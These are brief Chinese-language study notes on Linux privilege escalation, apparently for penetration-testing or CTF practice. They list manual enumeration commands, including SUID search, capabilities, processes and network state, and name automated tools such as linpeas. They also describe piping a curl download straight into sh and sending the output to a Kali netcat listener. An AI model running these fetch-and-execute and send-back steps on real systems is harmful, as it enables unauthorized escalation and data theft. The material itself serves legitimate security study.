提权原理
手工枚举
查看网络
getcap -r / 2>/dev/null
echo $PATH 环境变量
env
ps -ef | ps ax(没有连接到终端)j(显示进程数)f | ps -a(显示所有用户进程)u(显示启动进程的用户)x
top命令top -n 1 只显示一次进程不随时更新
知道进程之后发现服务
netstat -at /-au t=tcp u=udp
netstat -ano a=all n=不解析名称 o=显示计时器timer
find / -perm -u=s -type f 2>/dev/null
which awk perl python ruby gcc vi vim nmap find netcat nc wget tftp ftp tmux screen 2>/dev/null #查看当前机器安装了什么东西which查询可执行文件
检测并挂载
cat /etcfstab
自动化提权工具
linpeas.sh
1.通过curl进行在用管道符传到sh中实现不落地实行
发现报错,可能是用了重定向,添加-L参数follow重定向
curl -L https://githuib...
2.将输出回传到kali上
通过这种方式将输出文件回传到kali上
kali设置
nc -lvnp 81 | tee linpeas.txt
回传后不能通过vim进行,可能会有乱码
通过less -r linpeas.txt 进行查看二进制文件
3.不通过curl方式的不落地实现
linEnum
linux-smart-enumeration
linux-exploit-suggester
lunuxprivchecker -python语言格式
unix-privsec-check
目标系统环境影响使用环境,比如如果没有python,或者对某个关键字进行了屏蔽,就要我们学习好几个工具,而不是一个工具
